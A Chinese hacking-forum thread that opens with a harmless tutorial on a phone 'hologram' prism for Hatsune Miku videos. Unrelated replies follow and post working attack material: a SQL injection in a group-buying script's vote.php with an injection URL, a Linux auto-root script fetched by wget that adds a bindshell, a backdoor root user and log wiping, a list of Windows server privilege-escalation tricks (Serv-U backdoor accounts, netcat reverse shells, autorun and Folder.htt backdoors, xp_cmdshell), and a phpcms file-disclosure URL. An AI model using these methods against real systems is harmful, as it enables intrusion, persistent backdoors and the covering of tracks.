最近看过此主题的会员

返回列表 发帖

[图文+视频]手机全息投影 初音 Miku 立体投影制作方法

前两天很火的那个“初音手机全息投影”,实际上和全息没有任何关系,只是利用棱镜折射成4个角度观看,看看影片就知道了,屏幕分4份来播放4个角度的影片。

这种“全息投影”方案也只能观赏4个面,无法做到360度全息,如果想更全息一点的话,那就必须得增加投影面,例如8面、16面、32面等,但是这样的话投影面就变得很狭窄了,只能算是意淫全息投影……

网上已给出详细图文+视频教程,这里转过来。

以下内容转自:发个手机全息投影(制作方法已放出,已更新了视频链接)


制作方法在贴子底部(抱歉,之前有个边长搞错,已修正)。

已上链接,各位移步底部下载,有问题可跟贴

无聊时无意看到的。制作很简单,主要就是那个四面体。框框是用冰棍做的,简陋些。用9100当投影器是很不错的选择,因为9100黑色很纯。显示就用初音了。

上几个图,再上几个视频。

制作方法:

我是以我所做的材料做法来说明的。

材料:

1、屏幕保护贴,高透的,当然越大越好。其它的用透光好的胶片,有机玻璃,玻璃也行。总之只要是高透光无反光的就行。我用的就是之前买机送的保护贴了。

2、冰棍。边框材料,只要能放得下手机的什么都行,各位可根据身边的材料制作。

主体那个金字塔做法如下:

金字塔是由四个等腰三角形组成的。每个等腰三角形的顶角是70.5度,等腰三角形跟底面的夹角是45度。

如图

没量角器也可以根据边长做出。如要做跟9100屏幕配合的,底边长6CM就行。也就是做4个BC=6,AB=AC=5.19,AD=4.23的等腰三角形,AO=DO=3,然后用透明胶相继粘好,透明胶越细越好,也可以用胶水粘。

其它设备的话取屏幕宽度为边长BC,其它的边长就能求出了,有量角器的就更简单了。

底座如下,各位也可以自行发挥。主要是框框的高度要跟AO一样高。(材料够大的朋友可以像377楼inshoes那样做,那样只用粘一边,简单美观很多)

使用方法:

将我放出的视频放到手机上播放,视频是四个面的,也就是前后左右,对应金字塔的四个面。亮度调到最高。然后放到金字塔的框框上,调整图像的位置,OK!

有能力的也可以用显示器做个大的,那效果会更好。

网上这类视频真的很少。这种视频的制作现在一般是用MMD导出前后左右视频之后合并得到的。现在网上资源最多的就是初音了,其它模型也行。就算没有只用一个面的也行。

视频文件,先放出一部。

初音dear cocoa girls.part1.rar

初音dear cocoa girls.part2.rar

初音dear cocoa girls.part3.rar

另一个视频

test.part1.rar

test.part2.rar

test.part3.rar

test.part4.rar

test.part5.rar

又一个初音

Sweet_Devil.part1.rar

Sweet_Devil.part2.rar

一个车的视频

车全息视频.part1.rar

车全息视频.part2.rar

车全息视频.part3.rar

又一个初音

トリノコシティ.part1.rar

トリノコシティ.part2.rar

トリノコシティ.part3.rar

トリノコシティ.part4.rar

FirstKiss

FirstKiss.00.rar

新增一个初音

bye bye.part1.rar

bye bye.part2.rar

bye bye.part3.rar

bye bye.part4.rar

bye bye.part5.rar

打包的视频

地址1:http://115.com/file/dpb4whe6

地址2:http://115.com/file/ann7urkd

 

您可能还想看的主题:

非安全中国网10周年T恤申请及相关事宜补充说明

中兴(ZTE)手机存在后门,可获得 Root Shell

好莱坞女星斯嘉丽裸照外泄 黑客恐关60年

HTML5标准2014年完成,Flash发力移动平台

腾讯发布盲人专用手机QQ

僵尸网络“进化”感染众多手机 或盗取用户隐私

“僵尸病毒”疑为手机安全商炒作

手机轰炸

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

有条件的可以试试,,

TOP

易想团购vote.php SQL注入漏洞
./vote.php


if($_REQUEST['act']=='dovote')
{
        $ok = false;
        foreach($_REQUEST['name'] as $vote_ask_id=>$names) //便利name
        {                        //echo $vote_ask_id."||".$names;
                        foreach($names as $kk=>$name) // 再次便利 所以$_REQUEST['name']要是一个二维数组
                        {//echo "||$name";
                                if($name!='')
                                {
                                        $ok = true;
                                }
                        }
        }
        if(!$ok)
        {
                showErr($GLOBALS['lang']['YOU_DONT_CHOICE']); //name必须不等于空哦 否则程序退出
        }
        $vote_id = intval($_REQUEST['vote_id']);
        if(check_ipop_limit(get_client_ip(),"vote",3600,$vote_id)) //限制了ip当时不要紧 =下看下获取ip的代码 (防止刷票 一IP投票一次)
        
        {
                foreach($_REQUEST['name'] as $vote_ask_id=>$names) //和之前一样 重点是$vote_ask_id 继续向下看
                {
                        
                        foreach($names as $kk=>$name)
                        {
                                $name = htmlspecialchars(addslashes(trim($name)));
                                echo "<h5>".get_client_ip()."||id:$vote_ask_idsql:select * from ".DB_PREFIX."vote_result where name = '.$name.' and vote_id = .$vote_id. and vote_ask_id = .$vote_ask_id</h5>";
                                $result = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."vote_result where name = '".$name."' and vote_id = ".$vote_id." and vote_ask_id = ".$vote_ask_id); //咦没 引号?$vote_ask_id 哦他妈ye
                                $is_add = true;
                                if($result)
                                {
                                        $GLOBALS['db']->query("update ".DB_PREFIX."vote_result set count = count + 1 where name = '".$name."' and vote_id = ".$vote_id." and vote_ask_id = ".$vote_ask_id);
                                        if(intval($GLOBALS['db']->affected_rows())!=0)
                                        {
                                                $is_add = false;
                                        }
                                }
                                
看下获取ip的代码


// 获取客户端IP地址
function get_client_ip(){ //可控哟 绕过就简单了
   if (getenv("HTTP_CLIENT_IP") &amp;&amp; strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
       $ip = getenv("HTTP_CLIENT_IP");
   else if (getenv("HTTP_X_FORWARDED_FOR") &amp;&amp; strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
       $ip = getenv("HTTP_X_FORWARDED_FOR");
   else if (getenv("REMOTE_ADDR") &amp;&amp; strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
       $ip = getenv("REMOTE_ADDR");
   else if (isset($_SERVER['REMOTE_ADDR']) &amp;&amp; $_SERVER['REMOTE_ADDR'] &amp;&amp; strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
       $ip = $_SERVER['REMOTE_ADDR'];
   else
       $ip = "unknown";
   return($ip);
}
构造地址:


http://127.0.0.1/www/es2/vote.php?act=dovote&amp;name['][ss]=ss




















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Linux全自动提权脚本(Linux Auto Root)
亮点:比较全稳定排序更有优势(比较热门的内核版本EXP顺序较前)去除无用的功能(如查看配置文件)添加清屏清日志。尤其是清日志因为我发现他的清的不是很赶紧自己所产生的文件没有删除。添加bindshell功能添加增加用户功能用户名:toor完全是方便我等懒人~下面是具体使用方法:



cd /tmp
wget http://www.0855.tv/exploit/autoroot.pl
chmod +x autoroot.pl
./autoroot.pl复制代码使用 help 命令查看帮助信息。以下是具体命令:sysline 进入系统命令模式在此模式下输入的命令将会是系统命令varline 进入autoroot.pl命令模式在此模式下输入的命令是本脚本支持的命令sysinfo 查看系统信息如系统变量、内核版本、网络参数sysproc 查看系统进程信息logs 查看系统日志文件all 使用所有EXP进行自动提权gccinfo 查看gcc编译器信息如是否安装、安装路径等等clear 清屏cleanlog 清除系统日志以及本脚本生成的所有expbindshell 下载一个bindshell到/tmp目录下adduser 添加root权限用户用户名:toor在提权成功后使用.2.2 使用2.2.x版本内核exp进行自动提权2.4 使用2.4.x版本内核exp进行自动提权2.6 使用2.6.x版本内核exp进行自动提权freebsd 使用FreeBSD的内核exp进行自动提权mac 使用Mac OS的内核进行自动提权redhat 使用RedHat的内核exp进行自动提权sun 使用SunOs的内核exp进行自动提权ubuntu 使用Ubuntu内核exp进行自动提权下载地址:http://www.0855.tv/exploit/autoroot.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

网站入侵提权方法总结
1.radmin连接法
  条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来米成功过。,端口到是给对方打开了。
2.pcanywhere
  C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 这里下他的GIF文件,在本地安装pcanywhere上去
3.SAM破解
  C:WINNTsystem32config 下他的SAM 破解之
4.SU密码夺取
  C:Documents and SettingsAll Users「开始」菜单程序
  引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转       进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空 [USER=WekweN|1] Password= HomeDir=c: TimeOut=600 Maintenance=System Access1=C:|RWAMELCDP Access1=d:|RWAMELCDP Access1=f:|RWAMELCDP SKEYValues=       这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
5.c:winntsystem32inetsrvdata
  引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行
6.SU溢出提权
  这个网上教程N多 不详细讲解了
7.运行Csript
  引用:运行"cscript C:InetpubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps"来提升权限 用这个cscript C:InetpubAdminScriptsadsutil.vbs get w3svc/inprocessisapiapps 查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 再将asp.dll加入特权一族 asp.dll是放在c:winntsystem32inetsrvasp.dll (不同的机子放的位置不一定一样) 我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll" "C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32inetsrvasp.dll" 可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了
8.脚本提权
  c:Documents and SettingsAll Users「开始」菜单程序启动"写入bat,vbs
9.VNC
  这个是小花的文章 HOHO
  默认情况下VNC密码存放在HKCUSoftwareORLWinVNC3Password
  我们可以用vncx4
  破解它,vncx4使用很简单,只要在命令行下输入
  c:>vncx4 -W
  然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。
10.NC提权
  给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了
11.社会工程学之GUEST提权  很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮箱号 手机号 尽量看看 HOHO
12.IPC空连接
  如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令
13.替换服务
  这个不用说了吧?个人感觉相当复杂
14.autorun .inf
  autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信他不运行
15.desktop.ini与Folder.htt
  引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择“自定义文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”)然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码: <OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后门文件名”> </OBJECT> 然后你将你的后门文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门
16.su覆盖提权
  本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了
17.SU转发端口
  43958这个是 Serv -U 的本地管理端口。FPIPE.exe上传他,执行命令: Fpipe –v –l 3333 –r 43958 127.0.0.1 意思是将3333端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个服务器,IP填对方IP,帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了
18.SQL帐户密码泄露
  如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的ASP文件中看到),因为MSSQL是默认的SYSTEM权限。
  引用:对方没有删除xp_cmdshell 方法:使用Sqlexec.exe,在host 一栏中填入对方IP,User与Pass中填入你所得到的用户名与密码。format选择xp_cmdshell”%s”即可。然后点击connect,连接上后就可以在CMD一栏中输入你想要的CMD命令了
19.asp.dll
  引用:因为asp.dll是放在c:winntsystem32inetsrvasp.dll   (不同的机子放的位置不一定相同) 我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll" "C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32inetsrvasp.dll" 好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去 了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:InetpubAdminScripts>这个目录下. 那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.
20.Magic Winmail
  前提是你要有个webshell 引用:http://www.eviloctal.com/forum/read.php?tid=3587这里去看吧
21.DBO……    其实 提升权限的方式很多的 就看大家怎么利用了 HOHO 加油吧 将服务器控制到底


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

phpcms2008最新漏洞(2009.10.21)
<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>



phpcms 2008 远程文件泄露漏洞


########################## Securitylab.ir ######################## # Application Info: # Name: phpcms 2008 # Version: All ########################################################## # Vulnerability Info: # Type: Remote File Disclosure Vulnerability # Risk: Medium #==========================================================#  http://sitedir.com.cn/[path]/download.php?a_k=Jh5zIw==&amp;i  &amp;m=2&amp;f=../include/config.inc.php&amp;t"33577313&amp;ip7.0.0.1&amp;s=m/&amp;d=1  #==========================================================
###########################  </TABLE>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表